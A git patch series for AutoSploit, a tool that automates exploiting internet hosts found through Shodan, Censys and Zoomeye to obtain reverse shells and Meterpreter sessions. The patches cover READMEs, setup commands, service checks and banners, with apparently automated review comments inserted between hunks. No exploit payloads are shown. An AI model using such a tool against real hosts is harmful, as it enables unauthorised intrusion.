From 4485fa4b9b3521581f2f2bc711f953fae92da5d1 Mon Sep 17 00:00:00 2001 From: Ekultek Date: Fri, 2 Mar 2018 10:46:00 -0600 Subject: [PATCH 01/31] fixes issue #84 and issue #86 --- README.md | 17 +++++++++++++++-- api_calls/zoomeye.py | 2 +- autosploit/main.py | 3 ++- 3 files changed, 18 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 850d373..e4b81a3 100644 --- a/README.md +++ b/README.md @@ -9,6 +9,14 @@ Receiving back connections on your local machine might not be the best idea from The new version of AutoSploit has a feature that allows you to set a proxy before you connect and a custom user-agent. +# Helpful links + - [Usage](https://github.com/NullArray/AutoSploit#usage) + - [Dependencies](https://github.com/NullArray/AutoSploit#dependencies) + - [User Manual](https://github.com/NullArray/AutoSploit/wiki) + - [Shoutouts](https://github.com/NullArray/AutoSploit#acknowledgements) + - [Development](https://github.com/NullArray/AutoSploit#active-development) + - [Discord server](https://discord.gg/9BeeZQk) + ## Usage Clone the repo. Or deploy via Docker. Details for which can be found [here](https://github.com/NullArray/AutoSploit/tree/master/Docker) 
@@ -113,10 +121,15 @@ And thanks to [Khast3x](https://github.com/khast3x) for setting up Docker suppor ### Active Development -While this isn't exactly a Beta release it is an early release nonetheless as such the tool might be subject to changes in the future. + +While this isn't exactly a Beta release, AutoSploit 2.0 is an early release nonetheless as such the tool might be subject to changes in the future. I've been working on the new version of the tool in an open source capacity with the help of a number of developers -that have expressed an interest in doing so. The new version will include extra features such as the ability to load in a custom target and exploit list among many more enhancements. If you would like to keep up to date on all the most recent developments be sure to check out the [Development Branch](https://github.com/NullArray/AutoSploit/tree/dev-beta) +that have expressed an interest in doing so. If you would like to keep up to date on all the most recent developments be sure to check out the [Development Branch](https://github.com/NullArray/AutoSploit/tree/dev-beta). + +If you would like to contribute to the development of this project please be sure to read [CONTRIBUTING.md](https://github.com/NullArray/AutoSploit/blob/master/CONTRIBUTING.md) as it contains our contribution guidelines. + +If you need some help understanding the code, or want to chat with some other AutoSploit community members, feel free to join our [Discord chat](https://discord.gg/9BeeZQk). ### Note diff --git a/api_calls/zoomeye.py b/api_calls/zoomeye.py index 07db818..baf4ccf 100644 --- a/api_calls/zoomeye.py +++ b/api_calls/zoomeye.py @@ -67,7 +67,7 @@ def zoomeye(self): else: headers = { "Authorization": "JWT {}".format(str(token["access_token"])), - "agent": self.user_agent["User-Agent"] + "User-Agent": self.user_agent["User-Agent"] # oops } params = {"query": self.query, "page": "1", "facet": "ipv4"} req = requests.get( 
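Review bot: The trailing `# oops` on the new `"User-Agent"` header line records nothing a later reader can use; it should say what was wrong, for example `# header must be named User-Agent; the old "agent" key was never sent as one`. The enclosing `zoomeye` function starts before this hunk and continues after the `requests.get(` call, so I cannot see whether `self.user_agent` is always a populated mapping; if it can be `None` when no agent was requested, the subscript on this line raises `TypeError` before the request is made, which deserves either a guard or a documented precondition.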
diff --git a/autosploit/main.py b/autosploit/main.py
index b48ee83..7ab8931 100644
--- a/autosploit/main.py
+++ b/autosploit/main.py
@@ -27,7 +27,8 @@ def main():
 logo()
 info("welcome to autosploit, give us a little bit while we configure")
 info("checking for services")
- service_names = ("postgresql", "apache")
+ # according to ps aux, postgre and apache2 are the names of the services
+ service_names = ("postgres", "apache2")
 for service in list(service_names):
 if not check_services(service):
 choice = prompt("it appears that service {} is not enabled, would you like us to enable it for you[y/N]".format(service))
From e2dd4c34dd9cf0da394bb2246d06eac2f2a1a3e7 Mon Sep 17 00:00:00 2001
From: menkar3 <36867826+menkar3@users.noreply.github.com>
Date: Fri, 2 Mar 2018 18:49:20 +0200
Subject: [PATCH 02/31] added check if the services has started (#83)
---
 autosploit/main.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/autosploit/main.py b/autosploit/main.py
index 7ab8931..a42d8a9 100644
--- a/autosploit/main.py
+++ b/autosploit/main.py
@@ -30,17 +30,17 @@ def main():
 # according to ps aux, postgre and apache2 are the names of the services
 service_names = ("postgres", "apache2")
 for service in list(service_names):
- if not check_services(service):
+ while not check_services(service):
 choice = prompt("it appears that service {} is not enabled, would you like us to enable it for you[y/N]".format(service))
 if choice.lower().startswith("y"):
 if "postgre" in service:
 cmdline("sudo bash {}".format(START_POSTGRESQL_PATH))
 else:
 cmdline("sudo bash {}".format(START_APACHE_PATH))
- info("service started successfully")
 else:
 error("service {} is required to be started for autosploit to run, exiting".format(service.title()))
 sys.exit(1)
+ info("services started successfully")
 if len(sys.argv) > 1:
 info("attempting to load API keys")
From 76f4d658713e24031eee108dc015b5ac1b2dbc34 Mon Sep 17 00:00:00 2001 
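Review bot: The new `service_names` tuple hard-codes the process names of one distribution, so on systems where Apache's process is `httpd` rather than `apache2`, `check_services` reports the service as disabled even when it is running and the user is pushed into the start script. The comment above it should state where the names come from and their limit, e.g. `# process names as listed by ps on Debian/Ubuntu; other distributions (httpd on RHEL-style systems) will not match`. Separately, `list(service_names)` on the next line copies a tuple that is only iterated; `for service in service_names:` is enough. `main` continues past the end of this hunk.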
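Review bot: Turning the `if` into `while not check_services(service)` gives the user no feedback when the start script ran but the service still does not appear, because `info("services started successfully")` now prints only after the whole `for` loop; the prompt simply reappears and the user cannot tell whether anything happened. After each `cmdline(...)` call, report the outcome before looping again, e.g. `if not check_services(service): error("service {} did not come up after running the start script".format(service)); sys.exit(1)`. The moved message is also printed when every service was already running and nothing was started, so it should be conditional on a start having been attempted. The enclosing `main` continues past this hunk.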
From: ekultek
Date: Fri, 2 Mar 2018 11:07:06 -0600
Subject: [PATCH 03/31] updated the services check
---
 autosploit/main.py | 40 +++++++++++++++++++++++++++++-----------
 1 file changed, 29 insertions(+), 11 deletions(-)
diff --git a/autosploit/main.py b/autosploit/main.py
index a42d8a9..58e7694 100644
--- a/autosploit/main.py
+++ b/autosploit/main.py
@@ -1,12 +1,15 @@
 import sys
+import psutil
+
 from lib.cmdline.cmd import AutoSploitParser
 from lib.term.terminal import AutoSploitTerminal
 from lib.output import (
 info,
 warning,
 error,
- prompt
+ prompt,
+ misc_info
 )
 from lib.settings import (
 logo,
@@ -26,32 +29,47 @@ def main():
 logo()
 info("welcome to autosploit, give us a little bit while we configure")
- info("checking for services")
+ misc_info("checking for disabled services")
 # according to ps aux, postgre and apache2 are the names of the services
 service_names = ("postgres", "apache2")
 for service in list(service_names):
 while not check_services(service):
- choice = prompt("it appears that service {} is not enabled, would you like us to enable it for you[y/N]".format(service))
+ choice = prompt(
+ "it appears that service {} is not enabled, would you like us to enable it for you[y/N]".format(
+ service.title()
+ )
+ )
 if choice.lower().startswith("y"):
- if "postgre" in service:
- cmdline("sudo bash {}".format(START_POSTGRESQL_PATH))
- else:
- cmdline("sudo bash {}".format(START_APACHE_PATH))
+ try:
+ if "postgre" in service:
+ cmdline("sudo bash {}".format(START_POSTGRESQL_PATH))
+ else:
+ cmdline("sudo bash {}".format(START_APACHE_PATH))
+ # moving this back because it was funky to see it each run
+ info("services started successfully")
+ # this tends to show up when trying to start the services
+ # I'm not entirely sure why, but this fixes it
+ except psutil.NoSuchProcess:
+ pass
 else:
- error("service {} is required to be started for autosploit to run, exiting".format(service.title()))
+ error(
+ "service {} is required to be started for autosploit to run successfully (you can do it manually "
+ "by using the command `sudo service {} start`), exiting".format(
+ service.title(), service
+ )
+ )
 sys.exit(1)
- info("services started successfully")
 if len(sys.argv) > 1:
 info("attempting to load API keys")
 loaded_tokens = load_api_keys()
 AutoSploitParser().parse_provided(opts)
- info("checking if there are multiple exploit files")
+ misc_info("checking if there are multiple exploit files")
 loaded_exploits = load_exploits(EXPLOIT_FILES_PATH)
 AutoSploitParser().single_run_args(opts, loaded_tokens, loaded_exploits)
 else:
 warning("no arguments have been 
parsed, defaulting to terminal session. press 99 to quit and help to get help") - info("checking if there are multiple exploit files") + misc_info("checking if there are multiple exploit files") loaded_exploits = load_exploits(EXPLOIT_FILES_PATH) info("attempting to load API keys") loaded_tokens = load_api_keys() From 90254ac6d09db4a6ff228d2a95d05580c8711720 Mon Sep 17 00:00:00 2001 From: ekultek Date: Fri, 2 Mar 2018 11:07:31 -0600 Subject: [PATCH 04/31] changed the misc_info color so that it isn't as close to the prompt color --- lib/output.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/output.py b/lib/output.py index f31ebb7..5dddebf 100644 --- a/lib/output.py +++ b/lib/output.py @@ -35,7 +35,7 @@ def warning(text): def misc_info(text): print( - "[\033[96mi\033[0m] {}".format( + "[\033[90mi\033[0m] {}".format( text ) ) \ No newline at end of file From 979e1008de36df620eb7579f428fbe264176701c Mon Sep 17 00:00:00 2001 From: ekultek Date: Fri, 2 Mar 2018 12:23:52 -0600 Subject: [PATCH 05/31] minor update to a comment --- lib/banner.py | 18 +++++++++++++++--- lib/cmdline/cmd.py | 4 +++- 2 files changed, 18 insertions(+), 4 deletions(-) diff --git a/lib/banner.py b/lib/banner.py index eba935c..323fe52 100644 --- a/lib/banner.py +++ b/lib/banner.py @@ -1,3 +1,4 @@ +import os import random VERSION = "2.0" @@ -8,9 +9,9 @@ def banner_1(line_sep="#--", space=" " * 30): {sep1}Author : Vector/NullArray | _ |_ _| |_ ___| __|___| |___|_| |_ {sep1}Twitter: @Real__Vector | | | | _| . |__ | . | | . | | _| {sep1}Type : Mass Exploiter |__|__|___|_| |___|_____| _|_|___|_|_| -{sep1}Version: {v_num} |_| +{sep1}Version: {v_num}{spacer} |_| ##############################################\033[0m - """.format(sep1=line_sep, v_num=VERSION, space_sep=space) + """.format(sep1=line_sep, v_num=VERSION, space_sep=space, spacer=" " * 8) return banner 
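Review bot: The `except psutil.NoSuchProcess: pass` added around the start commands swallows the exception with no output, and because `info("services started successfully")` sits inside the same `try`, the user sees nothing and is sent straight back to the prompt by the `while` loop. `psutil.NoSuchProcess` is typically raised when a process psutil is inspecting exits before the attribute read completes, which would fit the comment's "shows up when trying to start the services"; the handler should at least say so, e.g. `except psutil.NoSuchProcess: misc_info("a process exited while the service check was running, checking again")`, and the "I'm not entirely sure why" comment should be replaced by that explanation once it is confirmed. It is also unclear which call in the `try` body can raise it, since `check_services` is evaluated in the `while` condition outside the `try`, so the handler may never fire for `cmdline`. `main` starts before this hunk and continues after it.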
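Review bot: `spacer=" " * 8` in the `banner_1` format call is a fixed width chosen for the current three-character `VERSION`, so the `|_|` column will drift as soon as the version string grows (e.g. "2.0.1"); derive it from the version instead, e.g. `spacer=" " * (11 - len(VERSION))` with a comment that 11 is the width the version column occupies in the art. The `space_sep=space` keyword is still passed although no `{space_sep}` placeholder is visible in the template lines shown here; if the full template does not use it either, drop the keyword and the `space` parameter's role should be documented. `banner_1` starts before this hunk.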
@@ -114,4 +115,15 @@ def banner_main(): banner_5, banner_4, banner_3, banner_2, banner_1 ] - return random.choice(banners)() + if os.getenv("Graffiti", False): + return banner_5() + elif os.getenv("AutosploitOG", False): + return banner_1() + elif os.getenv("Nuclear", False): + return banner_4() + elif os.getenv("SploitaSaurusRex", False): + return banner_3() + elif os.getenv("Autosploit2", False): + return banner_2() + else: + return random.choice(banners)() diff --git a/lib/cmdline/cmd.py b/lib/cmdline/cmd.py index 2ac9968..ec0d9ea 100644 --- a/lib/cmdline/cmd.py +++ b/lib/cmdline/cmd.py @@ -19,9 +19,11 @@ def __init__(self): @staticmethod def optparser(): + """ - the options object for our parser + the options function for our parser, it will put everything into play """ + parser = argparse.ArgumentParser( usage="python autosploit.py -[c|z|s|a] -[q] QUERY\n" "{spacer}[-C] WORKSPACE LHOST LPORT [-e]\n" From a62885be8e911f428aeb0134eecfd3bfc6df31b0 Mon Sep 17 00:00:00 2001 From: ekultek Date: Sun, 4 Mar 2018 10:44:35 -0600 Subject: [PATCH 06/31] updated the README and the links --- README.md | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index e4b81a3..e1d64b3 100644 --- a/README.md +++ b/README.md 
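Review bot: The new `if/elif` chain in `banner_main` reads five undocumented environment variables with `os.getenv(name, False)`; the `False` default adds nothing since `None` is already falsy, and nothing tells a reader that these variables exist or that any non-empty value (including "0") selects a banner. A short comment naming the variables plus a lookup table keeps the behavior and makes the override discoverable, as below; the `banners` list is still needed for the random fallback. `banner_main` starts before this hunk.
```python
    # … unchanged: banners list …
    # setting one of these environment variables (to any non-empty value) forces
    # a specific banner; otherwise one is chosen at random
    forced_banners = (
        ("Graffiti", banner_5),
        ("AutosploitOG", banner_1),
        ("Nuclear", banner_4),
        ("SploitaSaurusRex", banner_3),
        ("Autosploit2", banner_2),
    )
    for env_name, banner in forced_banners:
        if os.getenv(env_name):
            return banner()
    return random.choice(banners)()
```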
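Review bot: The rewritten `optparser` docstring now opens with an empty line before its text and is followed by a stray blank line; PEP 257 puts the summary on the first line, and the blank separates the docstring from the code it describes. The wording "it will put everything into play" also does not tell a reader what is returned; `"""Build and return the argparse parser for AutoSploit's command line options."""` states the contract the hunk shows (`parser = argparse.ArgumentParser(` follows immediately). `optparser` continues beyond this hunk.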
@@ -10,9 +10,14 @@ Receiving back connections on your local machine might not be the best idea from The new version of AutoSploit has a feature that allows you to set a proxy before you connect and a custom user-agent. # Helpful links + - [Usage](https://github.com/NullArray/AutoSploit#usage) - [Dependencies](https://github.com/NullArray/AutoSploit#dependencies) - [User Manual](https://github.com/NullArray/AutoSploit/wiki) + - [Extensive usage breakdown](https://github.com/NullArray/AutoSploit/wiki/Usage#usage-options) + - [Screenshots](https://github.com/NullArray/AutoSploit/wiki/Examples-and-images) + - [Reporting bugs/ideas](https://github.com/NullArray/AutoSploit/wiki/Bugs-and-ideas#bugs) + - [Development guidelines](https://github.com/NullArray/AutoSploit/wiki/Development-information#development-of-autosploit) - [Shoutouts](https://github.com/NullArray/AutoSploit#acknowledgements) - [Development](https://github.com/NullArray/AutoSploit#active-development) - [Discord server](https://discord.gg/9BeeZQk) @@ -119,7 +124,6 @@ Special thanks to [Ekultek](https://github.com/Ekultek) without whoms contributi And thanks to [Khast3x](https://github.com/khast3x) for setting up Docker support. - ### Active Development While this isn't exactly a Beta release, AutoSploit 2.0 is an early release nonetheless as such the tool might be subject to changes in the future. 
@@ -129,7 +133,9 @@ that have expressed an interest in doing so. If you would like to keep up to dat If you would like to contribute to the development of this project please be sure to read [CONTRIBUTING.md](https://github.com/NullArray/AutoSploit/blob/master/CONTRIBUTING.md) as it contains our contribution guidelines. -If you need some help understanding the code, or want to chat with some other AutoSploit community members, feel free to join our [Discord chat](https://discord.gg/9BeeZQk). +Please, also, be sure to read our [contribution standards](https://github.com/NullArray/AutoSploit/wiki/Development-information#contribution-standards) before sending pull requests + +If you need some help understanding the code, or want to chat with some other AutoSploit community members, feel free to join our [Discord server](https://discord.gg/9BeeZQk). ### Note From b4d9b1f84e29ef85be8eebda5970854b85a66735 Mon Sep 17 00:00:00 2001 From: ekultek Date: Sun, 4 Mar 2018 10:59:43 -0600 Subject: [PATCH 07/31] edited the README for the installation methods --- README.md | 34 ++++++++++++++++++++++++++++++---- 1 file changed, 30 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index e1d64b3..967f25e 100644 --- a/README.md +++ b/README.md @@ -12,6 +12,7 @@ The new version of AutoSploit has a feature that allows you to set a proxy befor # Helpful links - [Usage](https://github.com/NullArray/AutoSploit#usage) + - [Installing](https://github.com/NullArray/AutoSploit#Installation) - [Dependencies](https://github.com/NullArray/AutoSploit#dependencies) - [User Manual](https://github.com/NullArray/AutoSploit/wiki) - [Extensive usage breakdown](https://github.com/NullArray/AutoSploit/wiki/Usage#usage-options) 
@@ -21,15 +22,40 @@ The new version of AutoSploit has a feature that allows you to set a proxy befor - [Shoutouts](https://github.com/NullArray/AutoSploit#acknowledgements) - [Development](https://github.com/NullArray/AutoSploit#active-development) - [Discord server](https://discord.gg/9BeeZQk) + +# Installation -## Usage +Installing AutoSploit is very simple, you can find the latest stable release [here](https://github.com/NullArray/AutoSploit/releases/tag/2.0). You can also download the master branch as a [zip](https://github.com/NullArray/AutSploit/zipball/master) or [tarball](https://github.com/NullArray/AutSploit/tarball/master) or follow one of the below methods; -Clone the repo. Or deploy via Docker. Details for which can be found [here](https://github.com/NullArray/AutoSploit/tree/master/Docker) +###### Cloning -`git clone https://github.com/NullArray/AutoSploit.git` +```bash +sudo -s << EOF +git clone https://github.com/NullArray/Autosploit.git +cd AutoSploit +pip2 install -r requirements.txt +python2 autosploit.py +EOF +``` -Starting the program with `python autosploit.py` will open an AutoSploit terminal session. The options for which are as follows. +###### Docker +```bash +sudo -s << EOF +git clone https://github.com/NullArray/AutoSploit.git +cd AutoSploit/Docker +docker network create -d bridge haknet +docker run --network haknet --name msfdb -e POSTGRES_PASSWORD=s3cr3t -d postgres +docker build -t autosploit . +docker run -it --network haknet -p 80:80 -p 443:443 -p 4444:4444 autosploit +EOF +``` + +More information on running Docker can be found [here](https://github.com/NullArray/AutoSploit/tree/master/Docker) + +## Usage + +Starting the program with `python autosploit.py` will open an AutoSploit terminal session. The options for which are as follows. ``` 1. Usage And Legal 2. Gather Hosts From 05995a338baa76fefe37a94dc56591a1f742144e Mon Sep 17 00:00:00 2001 
From: Camille <13921610+jesuiscamille@users.noreply.github.com> Date: Tue, 6 Mar 2018 00:04:16 +0100 Subject: [PATCH 08/31] French translation (#93) * Added a helpful link directory * Update README.md * Update README.md * Update README.md * Adding a python version check in main.py: python version must be a 2.x one. * Added french translation ! * fixed markdown error * Damn, these comments really breaks the markdown. Removing them. * removing them all ! * git hell :( * I'll get it ! * fixed line 18 --- README-fr.md | 164 +++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 164 insertions(+) create mode 100644 README-fr.md diff --git a/README-fr.md b/README-fr.md new file mode 100644 index 0000000..05e28e1 --- /dev/null +++ b/README-fr.md 
@@ -0,0 +1,164 @@ +# AutoSploit + +Comme vous pouvez l'imaginer au vu du nom de ce projet, AutoSploit automatise l'exploitation d'hôtes distantes connectées à internet. Les adresses des hôtes à attaquer sont collectées automatiquement grâce à l'aide de Shodan, Censys et Zoomeye. Vous pouvez également utiliser vos propres listes de cibles. +Les modules Metasploit disponibles ont été sélectionnés afin de faciliter l'obtention d'exécution de code à distance ( Remote Code Execution, ou RCE ), qui permettent ensuite de créer des sessions terminal inversées ( reverse shell ) ou meterpreter ( via metasploit ). + +**Ne soyez pas stupides** + +Recevoir les connexions de vos victimes directement sur votre ordinateur n'est pas vraiment une bonne idée. Vous devriez considérer l'option de dépenser quelques euros dans un VPS ( ou VPN ). + +La nouvelle version d'AutoSploit permet néanmoins de définir un proxy et un User-Agent personalisé. + +# Liens utiles + + - [Utilisation](https://github.com/NullArray/AutoSploit/README-fr.md#Utilisation) + - [Installation](https://github.com/NullArray/AutoSploit/README-fr.md#Installation) + - [Dépendances](https://github.com/NullArray/AutoSploit/README-fr.md#Dépendances)) + - [Wiki](https://github.com/NullArray/AutoSploit/wiki) + - [Options d'usage extensif](https://github.com/NullArray/AutoSploit/wiki/Usage#usage-options) + - [Captures d'écran](https://github.com/NullArray/AutoSploit/wiki/Examples-and-images) + - [Rapporter un bug, donner une idée](https://github.com/NullArray/AutoSploit/wiki/Bugs-and-ideas#bugs) + - [Lignes directrices du développement](https://github.com/NullArray/AutoSploit/wiki/Development-information#development-of-autosploit) + - [Développement](https://github.com/NullArray/AutoSploit/README-fr.md#Développement) + - [Serveur discord ( en anglais, mais ne vous découragez pas ! )](https://discord.gg/9BeeZQk) + + +# Installation + +Installer AutoSploit est un jeu d'enfant. 
Vous pouvez trouver la dernière version stable [ici](https://github.com/NullArray/AutoSploit/releases/tag/2.0). Vous pouvez aussi télécharger la branche ``master`` en [zip](https://github.com/NullArray/AutSploit/zipball/master) ou en [tarball](https://github.com/NullArray/AutSploit/tarball/master). Vous pouvez également suivre une des méthodes ci-dessous; + +###### Cloner + +```bash +sudo -s << EOF +git clone https://github.com/NullArray/Autosploit.git +cd AutoSploit +pip2 install -r requirements.txt +python2 autosploit.py +EOF +``` + +###### Docker + +```bash +sudo -s << EOF +git clone https://github.com/NullArray/AutoSploit.git +cd AutoSploit/Docker +docker network create -d bridge haknet +docker run --network haknet --name msfdb -e POSTGRES_PASSWORD=s3cr3t -d postgres +docker build -t autosploit . +docker run -it --network haknet -p 80:80 -p 443:443 -p 4444:4444 autosploit +EOF +``` + +Plus d'informations sur la façon d'utiliser Docker [ici](https://github.com/NullArray/AutoSploit/tree/master/Docker) + +## Utilisation + +L'ouverture du programme avec `python autosploit.py` devrait ouvrir une session terminal AutoSploit. Les options sont les suivantes ( en anglais ). + +``` +1. Usage And Legal +2. Gather Hosts +3. Custom Hosts +4. Add Single Host +5. View Gathered Hosts +6. Exploit Gathered Hosts +99. Quit +``` + +Sélectionner l'option `2` vous demandra de choisir quel type d'hôtes rechercher. Vous pouvez par exemple rentrer `IIS` ou `Apache`. Ensuite, on vous demandera quel moteurs de recherches doivent être utilisés lors de la recherche. Si tout fontionne correctement, les hôtes collectées seront sauvegardées et utilisables dans le menu d'exploitation ( `Exploit` ) + +Depuis la version 2.0, AutoSploit peut être lancé avec des arguments/drapeaux. Pour en savoir plus, exécutez `python autosploit.py -h`. +Pour référence, voici les options ( en anglais ). 
+ +``` +usage: python autosploit.py -[c|z|s|a] -[q] QUERY + [-C] WORKSPACE LHOST LPORT [-e] + [--ruby-exec] [--msf-path] PATH [-E] EXPLOIT-FILE-PATH + [--rand-agent] [--proxy] PROTO://IP:PORT [-P] AGENT + +optional arguments: + -h, --help show this help message and exit + +search engines: + possible search engines to use + + -c, --censys use censys.io as the search engine to gather hosts + -z, --zoomeye use zoomeye.org as the search engine to gather hosts + -s, --shodan use shodan.io as the search engine to gather hosts + -a, --all search all available search engines to gather hosts + +requests: + arguments to edit your requests + + --proxy PROTO://IP:PORT + run behind a proxy while performing the searches + --random-agent use a random HTTP User-Agent header + -P USER-AGENT, --personal-agent USER-AGENT + pass a personal User-Agent to use for HTTP requests + -q QUERY, --query QUERY + pass your search query + +exploits: + arguments to edit your exploits + + -E PATH, --exploit-file PATH + provide a text file to convert into JSON and save for + later use + -C WORKSPACE LHOST LPORT, --config WORKSPACE LHOST LPORT + set the configuration for MSF (IE -C default 127.0.0.1 + 8080) + -e, --exploit start exploiting the already gathered hosts + +misc arguments: + arguments that don't fit anywhere else + + --ruby-exec if you need to run the Ruby executable with MSF use + this + --msf-path MSF-PATH pass the path to your framework if it is not in your + ENV PATH +``` + +# Dépendances + +AutoSploit exige la présence des modules Python2.7 suivants. + +``` +requests +psutil +``` + +Si vous ne les avez pas, vous pouvez les installer avec les commandes ci-dessous ( dans le dossier d'AutoSploit ): + +```bash +pip install requests psutil +``` + +ou + +```bash +pip install -r requirements.txt +``` + +Comme le programme invoque des fonctionalités du Metasploit, vous devez l'avoir installé au préalable. 
Vous pouvez en obtenir une copie depuis le site de Rapid7 en cliquant [ici](https://www.rapid7.com/products/metasploit/). + +### Développement + +Même si AutoSploit n'est pas vraiment en Béta, il est sujet à des changements dans le futur. + +Si vous souhaitez rester à jour au niveau du développement et obtenir avant tout le monde toutes les super nouvelles fonctionalités, utilisez la [branche de développement](https://github.com/NullArray/AutoSploit/tree/dev-beta). + +Si vous voulez contribuer au développement de ce projet, lisez [CONTRIBUTING.md](https://github.com/NullArray/AutoSploit/blob/master/CONTRIBUTING.md). Ce fichier contient nos lignes directrices de contribution. + +Aussi, lisez nos [standards de contribution](https://github.com/NullArray/AutoSploit/wiki/Development-information#contribution-standards) avant d'envoyer une pull request. + +Si vous souhaitez obtenir de l'aide avec le code, ou juste partager avec les autres membres de la communauté d'AutoSploit, rejoignez-nous sur notre [serveur Discord](https://discord.gg/9BeeZQk). ( Nous ne mordons pas ) + +## Note + +Si vous rencontrez un bug et que vous souhaitez le signaler, [ouvrez un ticket](https://github.com/NullArray/AutoSploit/issues). + +Merci d'avance. + +Traduction par [jesuiscamille](https://github.com/jesuiscamille). J'ai probablement fait des erreurs de conjugaison/orthographe/traduction. N'hésitez pas à juste [ouvrir un ticket](https://github.com/NullArray/AutoSploit/issues), c'est rapide et ça nous encourage :) ! From 8bb2a22898b0a006925683c6f3b72754e0ec7819 Mon Sep 17 00:00:00 2001 
From: Aidan Holland Date: Thu, 8 Mar 2018 07:33:58 -0500 Subject: [PATCH 09/31] Added Install script (#85) * Added a helpful link directory * Update README.md * Update README.md * Update README.md * Added install script * Check PATH * Fixed msfconsole PATH * Fixed ubuntu error * Added installation instructions * Use pip2 --- .gitignore | 2 +- CONTRIBUTING.md | 30 ++++++++++++++--------------- README.md | 21 +++++++++++++++------ autosploit.py | 2 +- install.sh | 50 +++++++++++++++++++++++++++++++++++++++++++++++++ 5 files changed, 82 insertions(+), 23 deletions(-) create mode 100755 install.sh diff --git a/.gitignore b/.gitignore index 589e0df..9e972d1 100644 --- a/.gitignore +++ b/.gitignore @@ -4,4 +4,4 @@ api.p hosts.txt secret.p uid.p -etc/tokens/* \ No newline at end of file +etc/tokens/* diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index c209f1f..6a02d39 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md 
@@ -2,11 +2,11 @@ All contributions to AutoSploit are not only welcomed, but highly appreciated, please keep in mind the following while making a pull request: - - Each request should make at least one logical change - - All contributions should be forked from the `dev-beta` branch - - Each request will need to be reviewed before merged, if anything seems weird we will either fix it or ask you to fix it for us - - If you have multiple pushes in one request, please squash them together (or we will before we merge) - - All pull requests that are merged are provided under the same license as the program is, keep the following in mind; +- Each request should make at least one logical change +- All contributions should be forked from the `dev-beta` branch +- Each request will need to be reviewed before merged, if anything seems weird we will either fix it or ask you to fix it for us +- If you have multiple pushes in one request, please squash them together (or we will before we merge) +- All pull requests that are merged are provided under the same license as the program is, keep the following in mind; > By submitting code contributions to AutoSploit via Git pull request or other, checking them into the AutoSploit's source code repository, it is understood (unless you specify otherwise) that you are offering the AutoSploit copyright holders the unlimited, non-exclusive right to reuse, modify, and re-license the code. This is important because the inability to re-license code has caused devastating problems for other software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them. 
@@ -14,13 +14,13 @@ All contributions to AutoSploit are not only welcomed, but highly appreciated, p To get started making a contribution please do the following: - - Fork the repository using the fork button - - `git clone https://github.com//AutoSploit.git -b dev-beta` - - Edit the code to your liking - - After editing `git branch && git checkout ` - - Add your commits and comment them - - `git push --set-upstream origin ` - - Open a [pull request](https://github.com/NullArray/AutoSploit/pulls) - - Wait for us to check it out - - Thank you. +- Fork the repository using the fork button +- `git clone https://github.com//AutoSploit.git -b dev-beta` +- Edit the code to your liking +- After editing `git branch && git checkout ` +- Add your commits and comment them +- `git push --set-upstream origin ` +- Open a [pull request](https://github.com/NullArray/AutoSploit/pulls) +- Wait for us to check it out + + Thank you. diff --git a/README.md b/README.md index 967f25e..19f4455 100644 --- a/README.md +++ b/README.md 
@@ -1,7 +1,6 @@ # AutoSploit -As the name might suggest AutoSploit attempts to automate the exploitation of remote hosts. Targets can be collected automatically through Shodan, Censys or Zoomeye. But options to add your custom targets and host lists have been included as well. -The available Metasploit modules have been selected to facilitate Remote Code Execution and to attempt to gain Reverse TCP Shells and/or Meterpreter sessions. Workspace, local host and local port for MSF facilitated back connections are configured by filling out the dialog that comes up before the exploit component is started +As the name might suggest AutoSploit attempts to automate the exploitation of remote hosts. Targets can be collected automatically through Shodan, Censys or Zoomeye. But options to add your custom targets and host lists have been included as well. The available Metasploit modules have been selected to facilitate Remote Code Execution and to attempt to gain Reverse TCP Shells and/or Meterpreter sessions. Workspace, local host and local port for MSF facilitated back connections are configured by filling out the dialog that comes up before the exploit component is started **Operational Security Consideration** 
@@ -68,8 +67,7 @@ Starting the program with `python autosploit.py` will open an AutoSploit termina Choosing option `2` will prompt you for a platform specific search query. Enter `IIS` or `Apache` in example and choose a search engine. After doing so the collected hosts will be saved to be used in the `Exploit` component. -As of version 2.0 AutoSploit can be started with a number of command line arguments/flags as well. Type `python autosploit.py -h` -to display all the options available to you. I've posted the options below as well for reference. +As of version 2.0 AutoSploit can be started with a number of command line arguments/flags as well. Type `python autosploit.py -h` to display all the options available to you. I've posted the options below as well for reference. ``` usage: python autosploit.py -[c|z|s|a] -[q] QUERY @@ -119,6 +117,14 @@ misc arguments: ENV PATH ``` +## Installation + +```bash +git clone https://github.com/NullArray/AutoSploit +cd AutoSploit +chmod +x install.sh +./install.sh +``` ## Dependencies 
@@ -149,12 +155,15 @@ Special thanks to [Ekultek](https://github.com/Ekultek) without whoms contributi And thanks to [Khast3x](https://github.com/khast3x) for setting up Docker support. +### Active Development + +While this isn't exactly a Beta release, AutoSploit 2.0 is an early release nonetheless as such the tool might be subject to changes in the future. ### Active Development -While this isn't exactly a Beta release, AutoSploit 2.0 is an early release nonetheless as such the tool might be subject to changes in the future. +While this isn't exactly a Beta release, AutoSploit 2.0 is an early release nonetheless as such the tool might be subject to changes in the future. -I've been working on the new version of the tool in an open source capacity with the help of a number of developers +I've been working on the new version of the tool in an open source capacity with the help of a number of developers that have expressed an interest in doing so. If you would like to keep up to date on all the most recent developments be sure to check out the [Development Branch](https://github.com/NullArray/AutoSploit/tree/dev-beta). If you would like to contribute to the development of this project please be sure to read [CONTRIBUTING.md](https://github.com/NullArray/AutoSploit/blob/master/CONTRIBUTING.md) as it contains our contribution guidelines. diff --git a/autosploit.py b/autosploit.py index 579923c..13c7eb5 100644 --- a/autosploit.py +++ b/autosploit.py @@ -2,4 +2,4 @@ if __name__ == "__main__": - main() \ No newline at end of file + main() diff --git a/install.sh b/install.sh new file mode 100755 index 0000000..b00b4a5 --- /dev/null +++ b/install.sh 
@@ -0,0 +1,50 @@
+#!/bin/bash
+
+echo " ____ __ __ ______ ___ _____ ____ _ ___ ____ ______ ";
+echo " / || | || | / \ / ___/| \| | / \| || |";
